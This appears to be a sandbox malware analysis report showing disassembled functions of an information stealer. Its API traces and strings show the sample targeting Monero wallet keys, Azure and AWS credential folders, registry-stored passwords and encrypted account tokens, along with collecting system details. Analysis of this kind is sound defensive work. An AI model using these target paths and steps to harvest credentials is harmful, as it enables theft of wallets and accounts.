Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 18103d9d84a18ceb6232dc60606adba945c0c79bb1a2d9692ee0a7f87ac2a34a
Instruction ID: acae13ce3cc6fce9e9074cda0e9bf127f707dfe31717083dbc26160707433974
Opcode Fuzzy Hash: 18103d9d84a18ceb6232dc60606adba945c0c79bb1a2d9692ee0a7f87ac2a34a
Instruction Fuzzy Hash: 7641D6BAA4020867DB94F770DC57FED733EAB66700F404458B645660C1EEB45BC9CB92

Function 00691310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 006912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006912B4
Part of subcall function 006912A0: RtlAllocateHeap.NTDLL(00000000), ref: 006912BB
Part of subcall function 006912A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 006912D7
Part of subcall function 006912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006912F5
Part of subcall function 006912A0: RegCloseKey.ADVAPI32(?), ref: 006912FF

lstrcat.KERNEL32(?,00000000), ref: 0069134F
lstrlen.KERNEL32(?), ref: 0069135C
lstrcat.KERNEL32(?,.keys), ref: 00691377

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0135A4B0,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00691465

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A

DeleteFileA.KERNEL32(00000000), ref: 006914EF

Strings

wallet_path, xrefs: 00691330
\Monero\wallet.keys, xrefs: 0069138D
.keys, xrefs: 0069136B
SOFTWARE\monero-project\monero-core, xrefs: 00691335

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 090abec85c52e4dc0c0028a94d5acde2841bed267c867f7bd9d22fd88d3cc2fa
Instruction ID: 655a51eba04539fae96376529e6e98164f558a8bb434c47ddf2e9d5d1d8e6cf8
Opcode Fuzzy Hash: 090abec85c52e4dc0c0028a94d5acde2841bed267c867f7bd9d22fd88d3cc2fa
Instruction Fuzzy Hash: 6C5134B19501195BCB95FB60DC91BEE737DAF55300F40419DB60A62082EF345F85CFAA

Function 006A7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006A7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006A757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7603
RtlAllocateHeap.NTDLL(00000000), ref: 006A760A
wsprintfA.USER32 ref: 006A7640

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Strings

C, xrefs: 006A754C
k, xrefs: 006A764D, 006A7655, 006A761B, 006A7623
\, xrefs: 006A7560
:, xrefs: 006A755C

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$k
API String ID: 1544550907-1212298063
Opcode ID: 9571fdd7e68b0aa8cf305ef38eada6cea9a3710d75b0f96c33d305cb4ce36268
Instruction ID: 177a12aed8075a267b66bc9cf05d56e328756d12afbc5f4915a56e98d314ffb8
Opcode Fuzzy Hash: 9571fdd7e68b0aa8cf305ef38eada6cea9a3710d75b0f96c33d305cb4ce36268
Instruction Fuzzy Hash: A84180B1D05248ABDB14EF94DC45BEEBBB9BF19700F100199F50A67280DB74AE44CFA5

Function 006975D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006972D0: memset.MSVCRT ref: 00697314
Part of subcall function 006972D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0069733A
Part of subcall function 006972D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006973B1
Part of subcall function 006972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0069740D
Part of subcall function 006972D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00697452
Part of subcall function 006972D0: HeapFree.KERNEL32(00000000), ref: 00697459

lstrcat.KERNEL32(2F74D020,006B17FC), ref: 00697606
lstrcat.KERNEL32(2F74D020,00000000), ref: 00697648
lstrcat.KERNEL32(2F74D020, : ), ref: 0069765A
lstrcat.KERNEL32(2F74D020,00000000), ref: 0069768F
lstrcat.KERNEL32(2F74D020,006B1804), ref: 006976A0
lstrcat.KERNEL32(2F74D020,00000000), ref: 006976D3
lstrcat.KERNEL32(2F74D020,006B1808), ref: 006976ED
task.LIBCPMTD ref: 006976FB

Strings

: , xrefs: 0069764E

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: ede245171b1d281a2f5d190b505589573632778b459da7ebcb4089bfa7d2501b
Instruction ID: c3123ef73875bd808befab46a7b5bbcd4a91817804b2a14e499f7fa7c41b3544
Opcode Fuzzy Hash: ede245171b1d281a2f5d190b505589573632778b459da7ebcb4089bfa7d2501b
Instruction Fuzzy Hash: 44316B71902109EFCF48EBB4EC99DFE737EBB55301F244219E502A72A0DA34E942DB55

Function 006972D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00697314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0069733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006973B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0069740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00697452
HeapFree.KERNEL32(00000000), ref: 00697459
task.LIBCPMTD ref: 00697555

Strings

Password, xrefs: 00697401

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettask
String ID: Password
API String ID: 2808661185-3434357891
Opcode ID: f7c7ef32a996843ea5cb9af8dc149721e1192b31c841b8b5d6dc35d0b24368c6
Instruction ID: 93bc6b8df2eea709506bea50df9473216ba4b983cf589a9c7fc043bcb5afe6ff
Opcode Fuzzy Hash: f7c7ef32a996843ea5cb9af8dc149721e1192b31c841b8b5d6dc35d0b24368c6
Instruction Fuzzy Hash: B76117B59141689BDB24DB50CC41BEAB7BDBF44300F0081E9E689A7641DB706BC9CFA5

Function 006A8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0135E0B0,00000000,?,006B0E2C,00000000,?,00000000), ref: 006A8130
RtlAllocateHeap.NTDLL(00000000), ref: 006A8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006A8158
__aulldiv.LIBCMT ref: 006A8172
__aulldiv.LIBCMT ref: 006A8180
wsprintfA.USER32 ref: 006A81AC

Strings

@, xrefs: 006A814D
%d MB, xrefs: 006A81A3

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 4fb6d7e0ecec8312623218b8156bb20cfcde37c7bbc9818019c2e6b306fdf88d
Instruction ID: 605e15297609a5c875208ad69b228240cc208edcc15799d1bdc6d0a37641974b
Opcode Fuzzy Hash: 4fb6d7e0ecec8312623218b8156bb20cfcde37c7bbc9818019c2e6b306fdf88d
Instruction Fuzzy Hash: 7E213EB1E44218ABDB04DFD4CC49FAEB7B9FB45700F204619F605BB280D77859018BA5

Function 0069BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

lstrlen.KERNEL32(00000000), ref: 0069BC9F

Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0069BCCD
lstrlen.KERNEL32(00000000), ref: 0069BDA5
lstrlen.KERNEL32(00000000), ref: 0069BDB9

Strings

AccountId, xrefs: 0069BCC4
AccountTokens, xrefs: 0069BB49
AccountTokens, xrefs: 0069BABA
SELECT service, encrypted_token FROM token_service, xrefs: 0069BBEB

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
